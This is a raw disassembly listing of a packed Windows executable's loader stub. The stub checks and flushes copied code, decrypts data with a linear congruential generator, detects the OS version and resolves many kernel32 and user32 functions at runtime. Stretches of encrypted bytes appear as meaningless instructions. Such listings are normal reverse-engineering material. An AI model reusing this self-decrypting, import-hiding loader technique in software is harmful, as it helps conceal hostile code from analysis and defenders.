loc_4D25EF: ; CODE XREF: sub_4D22E0+2FC�j
mov ecx, [ebp+var_60]
mov esi, [ebp+arg_0]
add esi, 0Ch
mov edi, [ebp+var_48]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+var_50]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_60]
push edx
mov eax, [ebp+var_48]
push eax
mov ecx, [ebp+var_8]
call sub_4D2090
cmp eax, [ebp+var_50]
jz short loc_4D2637
push 0
push 0
push 0
push 0EF0000F9h
call ds:dword_4E300C ;; RaiseException
loc_4D2637: ; CODE XREF: sub_4D22E0+344�j
mov ecx, [ebp+var_50]
push ecx
mov edx, [ebp+arg_0]
push edx
push 0
call sub_4D1F6E
add esp, 0Ch
cmp eax, [ebp+var_5C]
jz short loc_4D265F
push 0
push 0
push 0
push 0EF0000FBh
call ds:dword_4E300C ;; RaiseException
loc_4D265F: ; CODE XREF: sub_4D22E0+36C�j
mov eax, [ebp+var_50]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, ds:dword_4E668C
push edx
call ds:dword_4E6670 ;; FlushInstructionCache
mov eax, [ebp+var_48]
push eax
call ds:dword_4E3008 ;; LocalFree
mov ecx, [ebp+var_8]
push ecx
call ds:dword_4E3008 ;; LocalFree
push offset dword_4E6A28
call ds:dword_4E3000 ;; InitializeCriticalSection
push offset dword_4E6930
call ds:dword_4E3000 ;; InitializeCriticalSection
call sub_4D32E0
push 80h
call sub_4DD35A
add esp, 4
mov [ebp+var_6C], eax
cmp [ebp+var_6C], 0
jz short loc_4D26C6
mov ecx, [ebp+var_6C]
call sub_4D2DD0
mov [ebp+var_70], eax
jmp short loc_4D26CD
; ---------------------------------------------------------------------------
loc_4D26C6: ; CODE XREF: sub_4D22E0+3D7�j
mov [ebp+var_70], 0
loc_4D26CD: ; CODE XREF: sub_4D22E0+3E4�j
mov edx, offset dword_4D2720
mov eax, [ebp+var_70]
mov [edx+4], eax
call sub_4DDC17
mov ds:dword_4EB0DC, eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov ds:dword_4E6698, edx
mov eax, [ebp+var_4]
mov ds:off_4E669C, eax
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_4D22E0 endp
; ---------------------------------------------------------------------------
align 10h
loc_4D2700: ; CODE XREF: sub_4D2B8D�p
call sub_4D22E0
pop eax
call loc_4D2E60
pop eax
mov [esp+24h], eax
popa
pop eax
pop eax
call eax
call sub_4DF0BC
; ---------------------------------------------------------------------------
db 6 dup(0CCh)
dword_4D2720 dd 0 ; DATA XREF: sub_4D22E0:loc_4D26CD�o
; sub_4D97BF+2B�o ...
db 90h
db 1Eh, 91h, 0
aHereisbootcode db 27h,'HEREISBOOTCODE',27h,0
align 10h
dw 7
unicode 0, <>,0
a_text db '.text',0 ; DATA XREF: _6:off_4E669C�o
align 4
dd 22174h, 1000h, 13600h, 400h, 3 dup(0)
dd 60000020h, 6164722Eh, 6174h, 1C3Ch, 24000h, 1000h, 13A00h
dd 3 dup(0)
dd 40000040h, 7461642Eh, 61h, 0A9040h, 26000h, 4C00h, 14A00h
dd 3 dup(0)
dd 0C0000040h, 6478732Eh, 617461h, 18h, 0D0000h, 200h
dd 19600h, 3 dup(0)
dd 0C0000240h, 7865742Eh, 74h, 11ABFh, 0D1000h, 0B600h
dd 19800h, 3 dup(0)
dd 0E0000040h, 6164722Eh, 6174h, 0D76h, 0E3000h, 0E00h
dd 24E00h, 3 dup(0)
dd 0E0000040h, 7461642Eh, 61h, 7110h, 0E4000h, 1C00h, 25C00h
dd 3 dup(0)
dd 0E0000040h, 0B3h dup(0)
dd 32000000h, 30353030h
db 35h, 31h, 38h
; =============== S U B R O U T I N E =======================================
public start
start proc near
call $+5
pusha
call sub_4D2B8D
adc eax, 5E8810C3h
retn 8C47h
start endp
; ---------------------------------------------------------------------------
xor [edi-47h], eax
xor dl, [ecx-61A4583Ch]
rcl byte ptr [bx-20E1h], cl
clc
xchg ecx, [ebx]
dec ecx
loc_4D2B58: ; CODE XREF: _4:004D2B5E�j
dec edi
mov cl, 1Eh
sahf
or [eax], cl
loope loc_4D2B58
wait
mov bl, 84h
js short loc_4D2BCB
retn 7A76h
; ---------------------------------------------------------------------------
mov dword ptr [ebx+744C4163h], 0C00559B1h
enter 3835h, 46h
mov cl, 59h
add eax, 3835C8C0h
inc esi
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4D2B7E proc near ; CODE XREF: _4:004D2F39�p _4:004D3CB0�p ...
jmp sub_4D989D
sub_4D2B7E endp
; ---------------------------------------------------------------------------
jmp loc_4D98B6
; ---------------------------------------------------------------------------
jmp loc_4D98B6
; =============== S U B R O U T I N E =======================================
sub_4D2B8D proc near ; CODE XREF: start+6�p
call loc_4D2700
jmp sub_4E2AB0
sub_4D2B8D endp
; ---------------------------------------------------------------------------
jmp sub_4E2AB0
; ---------------------------------------------------------------------------
dd 0CBCB4CE9h, 0E452E9DBh, 0E7E9626Dh, 0E9234555h, 473B8650h
dd 0C8A1DF57h, 0ECDB565h, 0E718883Eh, 0E93E1987h, 20h
dd 0F3h
db 0, 4, 6
; ---------------------------------------------------------------------------
loc_4D2BCB: ; CODE XREF: _4:004D2B63�j
add ah, dh
or [eax], eax
; ---------------------------------------------------------------------------
db 0
dd 5 dup(0)
dd 3FBE2A86h, 0D6C18DF1h, 9B10BF1Fh, 0BCAA1A91h, 2E6D7A6Eh
dd 2E657865h, 584F42h, 71h dup(0)
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D2DD0 proc near ; CODE XREF: sub_4D22E0+3DC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov dword ptr [eax+78h], 0
mov ecx, [ebp+var_8]
mov dword ptr [ecx+7Ch], 0
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_4E3014 ;; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4D2E12
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_4E300C ;; RaiseException
loc_4D2E12: ; CODE XREF: sub_4D2DD0+2F�j
mov edx, [ebp+var_8]
push edx
call ds:dword_4E3000 ;; InitializeCriticalSection
mov eax, [ebp+var_8]
add eax, 18h
push eax
call ds:dword_4E3000 ;; InitializeCriticalSection
mov ecx, [ebp+var_8]
add ecx, 30h
push ecx
call ds:dword_4E3000 ;; InitializeCriticalSection
mov edx, [ebp+var_8]
add edx, 48h
push edx
call ds:dword_4E3000 ;; InitializeCriticalSection
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_4D2DD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D2E50 proc near ; CODE XREF: sub_4D7DD0+50�p
push ebp
mov ebp, esp
mov eax, ds:dword_4E6688
mov al, [eax+70h]
pop ebp
retn
sub_4D2E50 endp
; ---------------------------------------------------------------------------
align 10h
loc_4D2E60: ; CODE XREF: _4:004D2706�p
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
mov eax, [ebp+8]
mov ds:dword_4E6688, eax
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_4E6718 ;; GetModuleHandleA
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz short loc_4D2E99
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_4E6778 ;; RaiseException
loc_4D2E99: ; CODE XREF: _4:004D2E86�j
push offset aVirtualalloc ; "VirtualAlloc"
mov ecx, [ebp-8]
push ecx
call ds:dword_4E6728 ;; GetProcAddress
mov [ebp-0Ch], eax
cmp dword ptr [ebp-0Ch], 0
jnz short loc_4D2EC2
push 0
push 0
push 0
push 0EF0000FCh
call ds:dword_4E6778 ;; RaiseException
loc_4D2EC2: ; CODE XREF: _4:004D2EAF�j
push 4
push 1000h
push 1000h
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_4E6674, eax
push 4
push 2000h
call ds:dword_4E673C ;; GetTickCount
xor edx, edx
mov ecx, 8000h
div ecx
push edx
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_4E667C, eax
push 4
push 1000h
push 1000h
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_4E6678, eax
mov edx, ds:dword_4E6674
mov dword ptr [edx], 19660Dh
mov eax, ds:dword_4E6678
mov dword ptr [eax], 3C6EF35Fh
mov dword ptr [ebp-14h], 0
mov dword ptr [ebp-4], 0
push 2E0000h
call sub_4D2B7E
adc eax, 3C65AC02h
cmpxchg [esi], cl
xchg edi, [edx+2E8519EFh]
cmp ecx, ebx
xchg eax, ecx
db 66h
out 0F9h, al ; AT 80287 data.
; 286 sends opcodes & operands and receives results.
mov [ecx+5Ch], ebp
dec edi
db 36h
pop edi
xlat
sbb ecx, [esi]
add [edx+7154A10Dh], eax
dec esp
xor [eax+73h], ecx
mov ds:48B5728Dh, al
db 3Eh
xor [ebx+78h], ecx
mov dl, 8Ah
fcomp qword ptr [eax+ebx*8-38h]
and eax, 8467D355h
xchg eax, ecx
sahf
and [ebp-136E4BBFh], al
or ah, [ebx-48D2FD85h]
inc edi
mov esp, 77849591h
add eax, 4C759C32h
pop ds
xchg eax, esi
push ds
cmp cl, [edi-1]
and al, 31h
db 3Eh
dec ebx
xor [ebp+72h], ah
; ---------------------------------------------------------------------------
aDmqqh?2rr3EUul db 'dŒqqH?23Ò…Òuî‹E',8,'ƒÀq‰Eèh',1Bh,0
db '!',0
db 0E8h, 0BCh, 0FBh
dd 9090FFFFh, 0C985C933h, 558BEE75h, 8D8D52E8h, 0FFFFFF18h
dd 41EFE8h, 216800h, 9BE80026h, 90FFFFFBh, 85C03390h, 6AEE75C0h
dd 840D8B08h, 51004E66h, 0FF188D8Dh, 94E8FFFFh, 68000046h
dd 26h, 0FFFB75E8h, 0DD7144FFh, 57C78D29h, 56C454C1h, 0E9957046h
dd 2E4E5B6Ch, 7725EB5Bh, 0ADF7793Fh, 0D11C487Eh, 0C0E7F072h
dd 3F5DFA9Bh, 75E9DCC2h, 0F7518C7h, 0B6514437h, 6D7A8355h
dd 0C0339090h, 0EE75C085h, 66840D8Bh, 118B004Eh, 0A1F05589h
dd 4E6684h, 4D89088Bh, 9468ECh, 0F3E80000h, 830000A2h
dd 858904C4h, 0FFFFFEFCh, 0FEFC958Bh, 9589FFFFh, 0FFFFFF14h
dd 25B9h, 8BC03300h, 0FFFF14BDh, 8BABF3FFh, 0FFFF1485h
dd 9400C7FFh, 8B000000h, 0FFFF148Dh, 15FF51FFh, 4E6738h
dd 0FF14958Bh, 428BFFFFh, 6680A310h, 85C7004Eh, 0FFFFFF10h
dd 0
; ---------------------------------------------------------------------------
mov ecx, ds:dword_4E6680
mov [ebp-10Ch], ecx
cmp dword ptr [ebp-10Ch], 0
jz short loc_4D30E8
cmp dword ptr [ebp-10Ch], 1
jz short loc_4D30F7
cmp dword ptr [ebp-10Ch], 2
jz short loc_4D314E
jmp loc_4D31EB
; ---------------------------------------------------------------------------
loc_4D30E8: ; CODE XREF: _4:004D30CF�j
mov dword ptr [ebp-0F0h], offset aWin32s ; "win32s"
jmp loc_4D31EB
; ---------------------------------------------------------------------------
loc_4D30F7: ; CODE XREF: _4:004D30D8�j
mov edx, [ebp-0ECh]
cmp dword ptr [edx+8], 0
jnz short loc_4D310F
mov dword ptr [ebp-0F0h], offset aWindows95 ; "Windows95"
jmp short loc_4D3149
; ---------------------------------------------------------------------------
loc_4D310F: ; CODE XREF: _4:004D3101�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+8], 0Ah
jnz short loc_4D3127
mov dword ptr [ebp-0F0h], offset aWindows98 ; "Windows98"
jmp short loc_4D3149
; ---------------------------------------------------------------------------
loc_4D3127: ; CODE XREF: _4:004D3119�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+8], 5Ah
jnz short loc_4D313F
mov dword ptr [ebp-0F0h], offset aWindowsme ; "WindowsMe"
jmp short loc_4D3149
; ---------------------------------------------------------------------------
loc_4D313F: ; CODE XREF: _4:004D3131�j
mov dword ptr [ebp-0F0h], offset aWindows9xUnkno ; "Windows9x(unknown)"
loc_4D3149: ; CODE XREF: _4:004D310D�j _4:004D3125�j ...
jmp loc_4D31EB
; ---------------------------------------------------------------------------
loc_4D314E: ; CODE XREF: _4:004D30E1�j
mov edx, [ebp-0ECh]
cmp dword ptr [edx+4], 3
jnz short loc_4D3169
mov dword ptr [ebp-0F0h], offset aWindowsnt3_51 ; "WindowsNT(3.51)"
jmp loc_4D31EB
; ---------------------------------------------------------------------------
loc_4D3169: ; CODE XREF: _4:004D3158�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+4], 4
jnz short loc_4D3181
mov dword ptr [ebp-0F0h], offset aWindowsnt4_0 ; "WindowsNT(4.0)"
jmp short loc_4D31EB
; ---------------------------------------------------------------------------
loc_4D3181: ; CODE XREF: _4:004D3173�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+4], 5
jnz short loc_4D31E1
mov edx, [ebp-0ECh]
cmp dword ptr [edx+8], 0
jnz short loc_4D31A5
mov dword ptr [ebp-0F0h], offset aWindows2000 ; "Windows2000"
jmp short loc_4D31DF
; ---------------------------------------------------------------------------
loc_4D31A5: ; CODE XREF: _4:004D3197�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+8], 1
jnz short loc_4D31BD
mov dword ptr [ebp-0F0h], offset aWindowsxp ; "WindowsXP"
jmp short loc_4D31DF
; ---------------------------------------------------------------------------
loc_4D31BD: ; CODE XREF: _4:004D31AF�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+8], 2
jnz short loc_4D31D5
mov dword ptr [ebp-0F0h], offset aWindows_net ; "Windows.NET"
jmp short loc_4D31DF
; ---------------------------------------------------------------------------
loc_4D31D5: ; CODE XREF: _4:004D31C7�j
mov dword ptr [ebp-0F0h], offset aWindowsntUnkno ; "WindowsNT(unknown)"
loc_4D31DF: ; CODE XREF: _4:004D31A3�j _4:004D31BB�j ...
jmp short loc_4D31EB
; ---------------------------------------------------------------------------
loc_4D31E1: ; CODE XREF: _4:004D318B�j
mov dword ptr [ebp-0F0h], offset aWindowsntUnkno ; "WindowsNT(unknown)"
loc_4D31EB: ; CODE XREF: _4:004D30E3�j _4:004D30F2�j ...
mov edx, [ebp-0ECh]
mov [ebp-108h], edx
mov eax, [ebp-108h]
push eax
call sub_4DD3DD
add esp, 4
mov ecx, ds:dword_4E6684
mov edx, [ecx+2Ch]
mov [ebp-0F4h], edx
cmp dword ptr [ebp-0F4h], 0
jz short loc_4D328F
mov eax, [ebp-0F4h]
mov [ebp-0FCh], eax
mov dword ptr [ebp-0F8h], 0
jmp short loc_4D3245
; ---------------------------------------------------------------------------
loc_4D3236: ; CODE XREF: _4:004D328D�j
mov ecx, [ebp-0F8h]
add ecx, 1
mov [ebp-0F8h], ecx
loc_4D3245: ; CODE XREF: _4:004D3234�j
cmp dword ptr [ebp-0F8h], 80h
jge short loc_4D328F
mov edx, [ebp-0FCh]
imul edx, 19660Dh
add edx, 3C6EF35Fh
mov [ebp-0FCh], edx
mov eax, [ebp-0F8h]
mov ecx, [ebp-0F4h]
mov edx, [ecx+eax*4]
xor edx, [ebp-0FCh]
mov eax, [ebp-0F8h]
mov ecx, [ebp-0F4h]
mov [ecx+eax*4], edx
jmp short loc_4D3236
; ---------------------------------------------------------------------------
loc_4D328F: ; CODE XREF: _4:004D321C�j _4:004D324F�j
mov edx, ds:dword_4E6684
mov eax, [edx+24h]
and eax, 10h
neg eax
sbb eax, eax
neg eax
mov ds:byte_4E6694, al
call sub_4D9DC0
mov ecx, [ebp-14h]
mov [ebp+8], ecx
cmp ds:dword_4EAA54, 0
jz short loc_4D32CD
push 0
push 0
push 0
mov edx, ds:dword_4EAA54
push edx
call ds:dword_4E6838 ;; PostMessageA
loc_4D32CD: ; CODE XREF: _4:004D32B8�j
xor eax, eax
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D32E0 proc near ; CODE XREF: sub_4D22E0+3BE�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_4E3014 ;; GetModuleHandleA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4D330B
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_4E300C ;; RaiseException
loc_4D330B: ; CODE XREF: sub_4D32E0+18�j
push offset aClosehandle ; "CloseHandle"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66A4, eax
push offset aCreatefilea ; "CreateFileA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66A8, eax
push offset aCreatefilew ; "CreateFileW"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66AC, eax
push offset aCreatefilemapp ; "CreateFileMappingA"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66B0, eax
push offset aCreatefilema_0 ; "CreateFileMappingW"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66B4, eax
push offset aCreateprocessa ; "CreateProcessA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66B8, eax
push offset aDebugbreak ; "DebugBreak"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66BC, eax
push offset aDeletefilea ; "DeleteFileA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66C0, eax
push offset aEntercriticals ; "EnterCriticalSection"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66C4, eax
push offset aExitprocess ; "ExitProcess"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66C8, eax
push offset aFindclose ; "FindClose"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66CC, eax
push offset aFindfirstfilea ; "FindFirstFileA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66D0, eax
push offset aFindnextfilea ; "FindNextFileA"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66D4, eax
push offset aFlushfilebuffe ; "FlushFileBuffers"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66D8, eax
push offset aFormatmessagea ; "FormatMessageA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66DC, eax
push offset aFreelibrary ; "FreeLibrary"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66E0, eax
push offset aGetcurrentproc ; "GetCurrentProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66E4, eax
push offset aGetcurrentpr_0 ; "GetCurrentProcessId"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66E8, eax
push offset aGetenvironment ; "GetEnvironmentVariableA"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66EC, eax
push offset aGetexitcodepro ; "GetExitCodeProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66F0, eax
push offset aGetfileattribu ; "GetFileAttributesA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66F4, eax
push offset aGetfileattri_0 ; "GetFileAttributesW"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66F8, eax
push offset aGetfileinforma ; "GetFileInformationByHandle"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E66FC, eax
push offset aGetfilesize ; "GetFileSize"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6700, eax
push offset aGetfiletime ; "GetFileTime"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6704, eax
push offset aGetfullpathnam ; "GetFullPathNameA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6708, eax
push offset aGetfullpathn_0 ; "GetFullPathNameW"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E670C, eax
push offset aGetlasterror ; "GetLastError"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6710, eax
push offset aGetmodulefilen ; "GetModuleFileNameA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6714, eax
push offset aGetmodulehandl ; "GetModuleHandleA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6718, eax
push offset aGetprivateprof ; "GetPrivateProfileIntA"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E671C, eax
push offset aGetprivatepr_0 ; "GetPrivateProfileSectionNamesA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6720, eax
push offset aGetprivatepr_1 ; "GetPrivateProfileStringA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6724, eax
push offset aGetprocaddress ; "GetProcAddress"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6728, eax
push offset aGetsystemtimea ; "GetSystemTimeAsFileTime"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E672C, eax
push offset aGettempfilenam ; "GetTempFileNameA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6730, eax
push offset aGettemppatha ; "GetTempPathA"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6734, eax
push offset aGetversionexa ; "GetVersionExA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6738, eax
push offset aGettickcount ; "GetTickCount"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E673C, eax
push offset aHeapalloc ; "HeapAlloc"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6740, eax
push offset aHeapfree ; "HeapFree"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6744, eax
push offset aHeapcreate ; "HeapCreate"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6748, eax
push offset aInitializecrit ; "InitializeCriticalSection"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E674C, eax
push offset aDeletecritical ; "DeleteCriticalSection"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6750, eax
push offset aLeavecriticals ; "LeaveCriticalSection"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6754, eax
push offset aLoadlibrarya ; "LoadLibraryA"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E675C, eax
push offset aLoadlibraryexa ; "LoadLibraryExA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6758, eax
push offset aLocalalloc ; "LocalAlloc"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6760, eax
push offset aLocalfree ; "LocalFree"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6764, eax
push offset aLockfile ; "LockFile"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6768, eax
push offset aMapviewoffile ; "MapViewOfFile"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E676C, eax
push offset aMultibytetowid ; "MultiByteToWideChar"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6770, eax
push offset aOpenprocess ; "OpenProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6774, eax
push offset aRaiseexception ; "RaiseException"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6778, eax
push offset aReadfile ; "ReadFile"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E677C, eax
push offset aSetenvironment ; "SetEnvironmentVariableA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6780, eax
push offset aSetevent ; "SetEvent"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6784, eax
push offset aSetfilepointer ; "SetFilePointer"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6788, eax
push offset aSetlasterror ; "SetLastError"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E678C, eax
push offset aSetunhandledex ; "SetUnhandledExceptionFilter"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6790, eax
push offset aSleep ; "Sleep"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6794, eax
push offset aTerminateproce ; "TerminateProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6798, eax
push offset aUnlockfile ; "UnlockFile"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E679C, eax
push offset aUnmapviewoffil ; "UnmapViewOfFile"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67A0, eax
push offset aVirtualalloc ; "VirtualAlloc"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67A4, eax
push offset aVirtualfree ; "VirtualFree"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67A8, eax
push offset aVirtualprotect ; "VirtualProtect"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67AC, eax
push offset aVirtualquery ; "VirtualQuery"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67B0, eax
push offset aWaitforsingleo ; "WaitForSingleObject"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67B4, eax
push offset aWidechartomult ; "WideCharToMultiByte"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67B8, eax
push offset aWritefile ; "WriteFile"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67BC, eax
push offset aLstrcmpia ; "lstrcmpiA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67C0, eax
push offset aUser32_dll_0 ; "user32.dll"
call ds:dword_4E675C ;; LoadLibraryA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_4D38D0
push 0
push 0
push 0
push 0EF0000F7h
call ds:dword_4E300C ;; RaiseException
loc_4D38D0: ; CODE XREF: sub_4D32E0+5DD�j
push offset aChangedisplays ; "ChangeDisplaySettingsA"
mov eax, [ebp+var_10]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67C4, eax
push offset aCharupperbuffa ; "CharUpperBuffA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67C8, eax
push offset aLoadimagea ; "LoadImageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67CC, eax
push offset aMessageboxa_0 ; "MessageBoxA"
mov eax, [ebp+var_10]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67D0, eax
push offset aWsprintfa ; "wsprintfA"
mov ecx, [ebp+var_10]
push ecx
